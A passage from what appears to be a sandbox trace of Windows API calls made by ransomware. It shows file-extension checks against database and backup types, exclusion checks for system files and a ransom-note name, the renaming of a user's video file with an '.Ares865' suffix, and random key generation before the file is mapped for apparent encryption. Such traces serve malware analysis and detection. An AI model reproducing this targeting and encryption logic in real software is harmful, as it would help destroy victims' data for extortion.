[0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accdt") returned 1 [0091.958] lstrlenW (lpString="accdw") returned 5 [0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accdw") returned 1 [0091.958] lstrlenW (lpString="accft") returned 5 [0091.958] lstrcmpiW (lpString1="Z.avi", lpString2="accft") returned 1 [0091.958] lstrlenW (lpString="adb") returned 3 [0091.958] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0091.959] lstrlenW (lpString="adb") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="adb") returned 1 [0091.959] lstrlenW (lpString="ade") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="ade") returned 1 [0091.959] lstrlenW (lpString="adf") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="adf") returned 1 [0091.959] lstrlenW (lpString="adn") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="adn") returned 1 [0091.959] lstrlenW (lpString="adp") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="adp") returned 1 [0091.959] lstrlenW (lpString="alf") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="alf") returned 1 [0091.959] lstrlenW (lpString="ask") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="ask") returned 1 [0091.959] lstrlenW (lpString="btr") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="btr") returned -1 [0091.959] lstrlenW (lpString="cat") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="cat") returned -1 [0091.959] lstrlenW (lpString="cdb") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="cdb") returned -1 [0091.959] lstrlenW (lpString="ckp") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="ckp") returned -1 [0091.959] lstrlenW (lpString="cma") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="cma") returned -1 [0091.959] lstrlenW (lpString="cpd") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="cpd") returned -1 [0091.959] lstrlenW (lpString="dacpac") returned 6 [0091.959] lstrcmpiW (lpString1="PZ.avi", lpString2="dacpac") returned 1 [0091.959] lstrlenW (lpString="dad") returned 3 [0091.959] lstrcmpiW (lpString1="avi", lpString2="dad") returned -1 [0091.959] lstrlenW (lpString="dadiagrams") returned 10 [0091.959] lstrcmpiW (lpString1="Q9brPZ.avi", lpString2="dadiagrams") returned 1 [0091.959] lstrlenW (lpString="daschema") returned 8 [0091.959] lstrcmpiW (lpString1="brPZ.avi", lpString2="daschema") returned -1 [0091.959] lstrlenW (lpString="db-journal") returned 10 [0091.959] lstrcmpiW (lpString1="Q9brPZ.avi", lpString2="db-journal") returned 1 [0091.959] lstrlenW (lpString="db-shm") returned 6 [0091.960] lstrcmpiW (lpString1="PZ.avi", lpString2="db-shm") returned 1 [0091.960] lstrlenW (lpString="db-wal") returned 6 [0091.960] lstrcmpiW (lpString1="PZ.avi", lpString2="db-wal") returned 1 [0091.960] lstrlenW (lpString="dbc") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dbc") returned -1 [0091.960] lstrlenW (lpString="dbs") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dbs") returned -1 [0091.960] lstrlenW (lpString="dbt") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dbt") returned -1 [0091.960] lstrlenW (lpString="dbv") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dbv") returned -1 [0091.960] lstrlenW (lpString="dbx") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dbx") returned -1 [0091.960] lstrlenW (lpString="dcb") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dcb") returned -1 [0091.960] lstrlenW (lpString="dct") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dct") returned -1 [0091.960] lstrlenW (lpString="dcx") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dcx") returned -1 [0091.960] lstrlenW (lpString="ddl") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="ddl") returned -1 [0091.960] lstrlenW (lpString="dlis") returned 4 [0091.960] lstrcmpiW (lpString1=".avi", lpString2="dlis") returned -1 [0091.960] lstrlenW (lpString="dp1") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dp1") returned -1 [0091.960] lstrlenW (lpString="dqy") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dqy") returned -1 [0091.960] lstrlenW (lpString="dsk") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dsk") returned -1 [0091.960] lstrlenW (lpString="dsn") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dsn") returned -1 [0091.960] lstrlenW (lpString="dtsx") returned 4 [0091.960] lstrcmpiW (lpString1=".avi", lpString2="dtsx") returned -1 [0091.960] lstrlenW (lpString="dxl") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="dxl") returned -1 [0091.960] lstrlenW (lpString="eco") returned 3 [0091.960] lstrcmpiW (lpString1="avi", lpString2="eco") returned -1 [0091.960] lstrlenW (lpString="ecx") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="ecx") returned -1 [0091.961] lstrlenW (lpString="edb") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="edb") returned -1 [0091.961] lstrlenW (lpString="epim") returned 4 [0091.961] lstrcmpiW (lpString1=".avi", lpString2="epim") returned -1 [0091.961] lstrlenW (lpString="fcd") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fcd") returned -1 [0091.961] lstrlenW (lpString="fdb") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fdb") returned -1 [0091.961] lstrlenW (lpString="fic") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fic") returned -1 [0091.961] lstrlenW (lpString="flexolibrary") returned 12 [0091.961] lstrlenW (lpString="fm5") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fm5") returned -1 [0091.961] lstrlenW (lpString="fmp") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fmp") returned -1 [0091.961] lstrlenW (lpString="fmp12") returned 5 [0091.961] lstrcmpiW (lpString1="Z.avi", lpString2="fmp12") returned 1 [0091.961] lstrlenW (lpString="fmpsl") returned 5 [0091.961] lstrcmpiW (lpString1="Z.avi", lpString2="fmpsl") returned 1 [0091.961] lstrlenW (lpString="fol") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fol") returned -1 [0091.961] lstrlenW (lpString="fp3") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fp3") returned -1 [0091.961] lstrlenW (lpString="fp4") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fp4") returned -1 [0091.961] lstrlenW (lpString="fp5") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fp5") returned -1 [0091.961] lstrlenW (lpString="fp7") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fp7") returned -1 [0091.961] lstrlenW (lpString="fpt") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="fpt") returned -1 [0091.961] lstrlenW (lpString="frm") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="frm") returned -1 [0091.961] lstrlenW (lpString="gdb") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0091.961] lstrlenW (lpString="gdb") returned 3 [0091.961] lstrcmpiW (lpString1="avi", lpString2="gdb") returned -1 [0091.962] lstrlenW (lpString="grdb") returned 4 [0091.962] lstrcmpiW (lpString1=".avi", lpString2="grdb") returned -1 [0091.962] lstrlenW (lpString="gwi") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="gwi") returned -1 [0091.962] lstrlenW (lpString="hdb") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="hdb") returned -1 [0091.962] lstrlenW (lpString="his") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="his") returned -1 [0091.962] lstrlenW (lpString="ib") returned 2 [0091.962] lstrcmpiW (lpString1="vi", lpString2="ib") returned 1 [0091.962] lstrlenW (lpString="idb") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="idb") returned -1 [0091.962] lstrlenW (lpString="ihx") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="ihx") returned -1 [0091.962] lstrlenW (lpString="itdb") returned 4 [0091.962] lstrcmpiW (lpString1=".avi", lpString2="itdb") returned -1 [0091.962] lstrlenW (lpString="itw") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="itw") returned -1 [0091.962] lstrlenW (lpString="jet") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="jet") returned -1 [0091.962] lstrlenW (lpString="jtx") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="jtx") returned -1 [0091.962] lstrlenW (lpString="kdb") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="kdb") returned -1 [0091.962] lstrlenW (lpString="kexi") returned 4 [0091.962] lstrcmpiW (lpString1=".avi", lpString2="kexi") returned -1 [0091.962] lstrlenW (lpString="kexic") returned 5 [0091.962] lstrcmpiW (lpString1="Z.avi", lpString2="kexic") returned 1 [0091.962] lstrlenW (lpString="kexis") returned 5 [0091.962] lstrcmpiW (lpString1="Z.avi", lpString2="kexis") returned 1 [0091.962] lstrlenW (lpString="lgc") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="lgc") returned -1 [0091.962] lstrlenW (lpString="lwx") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="lwx") returned -1 [0091.962] lstrlenW (lpString="maf") returned 3 [0091.962] lstrcmpiW (lpString1="avi", lpString2="maf") returned -1 [0091.962] lstrlenW (lpString="maq") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="maq") returned -1 [0091.963] lstrlenW (lpString="mar") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mar") returned -1 [0091.963] lstrlenW (lpString="marshal") returned 7 [0091.963] lstrcmpiW (lpString1="rPZ.avi", lpString2="marshal") returned 1 [0091.963] lstrlenW (lpString="mas") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mas") returned -1 [0091.963] lstrlenW (lpString="mav") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mav") returned -1 [0091.963] lstrlenW (lpString="maw") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="maw") returned -1 [0091.963] lstrlenW (lpString="mdbhtml") returned 7 [0091.963] lstrcmpiW (lpString1="rPZ.avi", lpString2="mdbhtml") returned 1 [0091.963] lstrlenW (lpString="mdn") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mdn") returned -1 [0091.963] lstrlenW (lpString="mdt") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mdt") returned -1 [0091.963] lstrlenW (lpString="mfd") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mfd") returned -1 [0091.963] lstrlenW (lpString="mpd") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mpd") returned -1 [0091.963] lstrlenW (lpString="mrg") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mrg") returned -1 [0091.963] lstrlenW (lpString="mud") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mud") returned -1 [0091.963] lstrlenW (lpString="mwb") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="mwb") returned -1 [0091.963] lstrlenW (lpString="myd") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="myd") returned -1 [0091.963] lstrlenW (lpString="ndf") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="ndf") returned -1 [0091.963] lstrlenW (lpString="nnt") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="nnt") returned -1 [0091.963] lstrlenW (lpString="nrmlib") returned 6 [0091.963] lstrcmpiW (lpString1="PZ.avi", lpString2="nrmlib") returned 1 [0091.963] lstrlenW (lpString="ns2") returned 3 [0091.963] lstrcmpiW (lpString1="avi", lpString2="ns2") returned -1 [0091.963] lstrlenW (lpString="ns3") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="ns3") returned -1 [0091.964] lstrlenW (lpString="ns4") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="ns4") returned -1 [0091.964] lstrlenW (lpString="nsf") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="nsf") returned -1 [0091.964] lstrlenW (lpString="nv") returned 2 [0091.964] lstrcmpiW (lpString1="vi", lpString2="nv") returned 1 [0091.964] lstrlenW (lpString="nv2") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="nv2") returned -1 [0091.964] lstrlenW (lpString="nwdb") returned 4 [0091.964] lstrcmpiW (lpString1=".avi", lpString2="nwdb") returned -1 [0091.964] lstrlenW (lpString="nyf") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="nyf") returned -1 [0091.964] lstrlenW (lpString="odb") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0091.964] lstrlenW (lpString="odb") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="odb") returned -1 [0091.964] lstrlenW (lpString="oqy") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="oqy") returned -1 [0091.964] lstrlenW (lpString="ora") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="ora") returned -1 [0091.964] lstrlenW (lpString="orx") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="orx") returned -1 [0091.964] lstrlenW (lpString="owc") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="owc") returned -1 [0091.964] lstrlenW (lpString="p96") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="p96") returned -1 [0091.964] lstrlenW (lpString="p97") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="p97") returned -1 [0091.964] lstrlenW (lpString="pan") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="pan") returned -1 [0091.964] lstrlenW (lpString="pdb") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="pdb") returned -1 [0091.964] lstrlenW (lpString="pdm") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="pdm") returned -1 [0091.964] lstrlenW (lpString="pnz") returned 3 [0091.964] lstrcmpiW (lpString1="avi", lpString2="pnz") returned -1 [0091.965] lstrlenW (lpString="qry") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="qry") returned -1 [0091.965] lstrlenW (lpString="qvd") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="qvd") returned -1 [0091.965] lstrlenW (lpString="rbf") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="rbf") returned -1 [0091.965] lstrlenW (lpString="rctd") returned 4 [0091.965] lstrcmpiW (lpString1=".avi", lpString2="rctd") returned -1 [0091.965] lstrlenW (lpString="rod") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="rod") returned -1 [0091.965] lstrlenW (lpString="rodx") returned 4 [0091.965] lstrcmpiW (lpString1=".avi", lpString2="rodx") returned -1 [0091.965] lstrlenW (lpString="rpd") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="rpd") returned -1 [0091.965] lstrlenW (lpString="rsd") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="rsd") returned -1 [0091.965] lstrlenW (lpString="sas7bdat") returned 8 [0091.965] lstrcmpiW (lpString1="brPZ.avi", lpString2="sas7bdat") returned -1 [0091.965] lstrlenW (lpString="sbf") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="sbf") returned -1 [0091.965] lstrlenW (lpString="scx") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="scx") returned -1 [0091.965] lstrlenW (lpString="sdb") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="sdb") returned -1 [0091.965] lstrlenW (lpString="sdc") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="sdc") returned -1 [0091.965] lstrlenW (lpString="sdf") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="sdf") returned -1 [0091.965] lstrlenW (lpString="sis") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="sis") returned -1 [0091.965] lstrlenW (lpString="spq") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="spq") returned -1 [0091.965] lstrlenW (lpString="te") returned 2 [0091.965] lstrcmpiW (lpString1="vi", lpString2="te") returned 1 [0091.965] lstrlenW (lpString="teacher") returned 7 [0091.965] lstrcmpiW (lpString1="rPZ.avi", lpString2="teacher") returned -1 [0091.965] lstrlenW (lpString="tmd") returned 3 [0091.965] lstrcmpiW (lpString1="avi", lpString2="tmd") returned -1 [0091.966] lstrlenW (lpString="tps") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="tps") returned -1 [0091.966] lstrlenW (lpString="trc") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0091.966] lstrlenW (lpString="trc") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="trc") returned -1 [0091.966] lstrlenW (lpString="trm") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="trm") returned -1 [0091.966] lstrlenW (lpString="udb") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="udb") returned -1 [0091.966] lstrlenW (lpString="udl") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="udl") returned -1 [0091.966] lstrlenW (lpString="usr") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="usr") returned -1 [0091.966] lstrlenW (lpString="v12") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="v12") returned -1 [0091.966] lstrlenW (lpString="vis") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="vis") returned -1 [0091.966] lstrlenW (lpString="vpd") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="vpd") returned -1 [0091.966] lstrlenW (lpString="vvv") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="vvv") returned -1 [0091.966] lstrlenW (lpString="wdb") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="wdb") returned -1 [0091.966] lstrlenW (lpString="wmdb") returned 4 [0091.966] lstrcmpiW (lpString1=".avi", lpString2="wmdb") returned -1 [0091.966] lstrlenW (lpString="wrk") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="wrk") returned -1 [0091.966] lstrlenW (lpString="xdb") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="xdb") returned -1 [0091.966] lstrlenW (lpString="xld") returned 3 [0091.966] lstrcmpiW (lpString1="avi", lpString2="xld") returned -1 [0091.966] lstrlenW (lpString="xmlff") returned 5 [0091.966] lstrcmpiW (lpString1="Z.avi", lpString2="xmlff") returned 1 [0091.966] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\uQ9brPZ.avi.Ares865") returned 113 [0091.966] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\uQ9brPZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\uq9brpz.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\uQ9brPZ.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\uq9brpz.avi.ares865"), dwFlags=0x1) returned 1 [0091.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\uQ9brPZ.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ydr8ingbrksvbw\\puwdkzf9ud\\gqnd8m 9bnk\\dsuw0nvop7yowlhk-m\\uq9brpz.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0091.967] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=76392) returned 1 [0091.967] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0091.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0091.968] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0091.968] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0091.968] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0091.968] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.968] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12d70, lpName=0x0) returned 0x15c [0091.969] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12d70) returned 0x190000 [0091.971] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0091.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0091.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0091.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0091.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0091.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0091.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0091.972] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0091.972] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0091.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0091.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0091.973] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0091.973] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0091.973] CloseHandle (hObject=0x15c) returned 1 [0091.974] CloseHandle (hObject=0x118) returned 1 [0091.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0091.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0091.983] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0091.983] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd25316d0, ftCreationTime.dwHighDateTime=0x1d4cfe8, ftLastAccessTime.dwLowDateTime=0x1aecb040, ftLastAccessTime.dwHighDateTime=0x1d4c9e5, ftLastWriteTime.dwLowDateTime=0x1aecb040, ftLastWriteTime.dwHighDateTime=0x1d4c9e5, nFileSizeHigh=0x0, nFileSizeLow=0xf3e1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XlFQyUGD8tGNyUN3xgK.avi", cAlternateFileName="XLFQYU~1.AVI")) returned 1 [0091.983] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.983] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="aoldtz.exe") returned 1 [0091.983] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2=".") returned 1 [0091.983] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="..") returned 1 [0091.983] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="windows") returned 1 [0091.983] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="bootmgr") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="temp") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="pagefile.sys") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="boot") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="ids.txt") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="ntuser.dat") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="perflogs") returned 1 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2="MSBuild") returned 1 [0091.984] lstrlenW (lpString="XlFQyUGD8tGNyUN3xgK.avi") returned 23 [0091.984] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\YDR8inGbRKsVbw\\puwDkZF9ud\\gqnd8m 9bnK\\DsUw0nvoP7YOwlHK-m\\uQ9brPZ.avi") returned 105 [0091.984] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="XlFQyUGD8tGNyUN3xgK.avi" | out: lpString1="XlFQyUGD8tGNyUN3xgK.avi") returned="XlFQyUGD8tGNyUN3xgK.avi" [0091.984] lstrlenW (lpString="XlFQyUGD8tGNyUN3xgK.avi") returned 23 [0091.984] lstrlenW (lpString="Ares865") returned 7 [0091.984] lstrcmpiW (lpString1="xgK.avi", lpString2="Ares865") returned 1 [0091.984] lstrlenW (lpString=".dll") returned 4 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2=".dll") returned 1 [0091.984] lstrlenW (lpString=".lnk") returned 4 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2=".lnk") returned 1 [0091.984] lstrlenW (lpString=".ini") returned 4 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2=".ini") returned 1 [0091.984] lstrlenW (lpString=".sys") returned 4 [0091.984] lstrcmpiW (lpString1="XlFQyUGD8tGNyUN3xgK.avi", lpString2=".sys") returned 1 [0091.984] lstrlenW (lpString="XlFQyUGD8tGNyUN3xgK.avi") returned 23 [0091.984] lstrlenW (lpString="bak") returned 3 [0091.984] lstrcmpiW (lpString1="avi", lpString2="bak") returned -1 [0091.984] lstrlenW (lpString="ba_") returned 3 [0091.984] lstrcmpiW (lpString1="avi", lpString2="ba_") returned -1 [0091.984] lstrlenW (lpString="dbb") returned 3 [0091.984] lstrcmpiW (lpString1="avi", lpString2="dbb") returned -1 [0091.984] lstrlenW (lpString="vmdk") returned 4 [0091.984] lstrcmpiW (lpString1=".avi", lpString2="vmdk") returned -1 [0091.984] lstrlenW (lpString="rar") returned 3 [0091.984] lstrcmpiW (lpString1="avi", lpString2="rar") returned -1 [0091.984] lstrlenW (lpString="zip") returned 3 [0091.984] lstrcmpiW (lpString1="avi", lpString2="zip") returned -1 [0091.984] lstrlenW (lpString="tgz") returned 3 [0091.984] lstrcmpiW (lpString1="avi", lpString2="tgz") returned -1 [0091.984] lstrlenW (lpString="vbox") returned 4 [0091.985] lstrcmpiW (lpString1=".avi", lpString2="vbox") returned -1 [0091.985] lstrlenW (lpString="vdi") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="vdi") returned -1 [0091.985] lstrlenW (lpString="vhd") returned 3 [0091.985] lstrcmpiW (lpString1="avi", lpString2="vhd") returned -1 [0091.985] lstrlenW (lpString="vhdx") returned 4 [0091.985] lstrcmpiW (lpString1=".avi", lpString2="vhdx") returned -1 [0091.985] lstrlenW (lpString="avhd") returned 4 [0091.985] lstrcmpiW (lpString1=".avi", 